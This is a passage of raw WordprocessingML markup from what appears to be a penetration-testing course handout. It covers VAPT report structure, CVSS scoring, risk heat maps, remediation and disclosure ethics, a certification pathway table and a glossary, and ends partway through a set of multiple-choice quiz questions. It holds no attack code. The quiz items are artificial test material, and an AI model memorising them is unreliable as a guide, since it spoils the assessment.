          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="175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Entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6043"/>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Broad, foundational security concepts across networking, threats and controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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CEH (EC-Council)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="175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Intermediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6043"/>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Certified Ethical Hacker — covers the tools and phases taught across this entire subject, conceptually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
            <w:shd w:fill="FFFFFF"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eJPT (eLearnSecurity / INE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="175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Beginner, practical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6043"/>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 hands-on, junior-level penetration testing certification focused on real lab exercises</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OSCP (OffSec)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="175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Advanced, practical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6043"/>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 rigorous, fully hands-on exam requiring candidates to compromise real lab machines and document findings professionally — widely respected in the industry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The practical skills built in this course — reconnaissance, Metasploit usage, privilege escalation, and manual web application testing — form a direct foundation for all four of these certifications, roughly in the order listed above (Security+ first, OSCP as a longer-term goal).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdn1ad5m29fwdxxrkpjs2vi">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">CompTIA Security+</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId-vvujl4ykrrrzunttybyt">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">EC-Council — Certified Ethical Hacker (CEH)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdxd9z2wqp-watvzamqhzx1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">INE / eLearnSecurity — eJPT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdv2o5hvyoknjionacnukdp">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">OffSec — OSCP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A professional VAPT report has a fixed structure: cover page, executive summary, scope &amp; methodology, technical findings, risk heat map, remediation priority/conclusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS base scores must be justified metric-by-metric, not just quoted as a number — the vector string is the evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A risk heat map (likelihood x impact) complements CVSS scoring for stakeholder communication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation strategies: patching, secure configuration, least privilege, input validation, output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Professional ethics: responsible disclosure, bug bounty platforms, written permission always, client confidentiality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This course maps onto Security+, CEH, eJPT and OSCP certification pathways.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Important Definitions &amp; Terminology</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2437"/>
        <w:gridCol w:w="7309"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Executive summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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 one-page, non-technical overview of findings and risk for management audiences</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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CVSS vector string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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The compact notation (e.g. AV:N/AC:L/...) recording exactly which metric value was chosen for each CVSS category</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Risk heat map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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 likelihood-vs-impact grid used to visually prioritise findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Responsible disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7309"/>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Privately reporting a vulnerability to the affected organisation, allowing time to fix it before any public release</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2437"/>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Bug bounty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="730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 programme where organisations reward researchers for responsibly reported vulnerabilities, via platforms like HackerOne or Bugcrowd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple-Choice Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which section of a VAPT report is written for a non-technical management audience?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technical Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Risk Heat Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A network-exploitable backdoor needing no authentication and giving full C/I/A compromise would typically score in which CVSS band?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Low</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why does a stored XSS typically score lower than a network-exploitable unauthenticated backdoor, even though both have Attack Vector: Network?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS cannot be exploited remotely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS usually requires user interaction and has only partial impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Backdoors are never network-reachable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVSS ignores XSS entirely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A risk heat map plots findings along which two axes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cost and time</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Likelihood and impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVSS and CWE</w:t>
      </w:r>
    </w:p>
    <w:p>
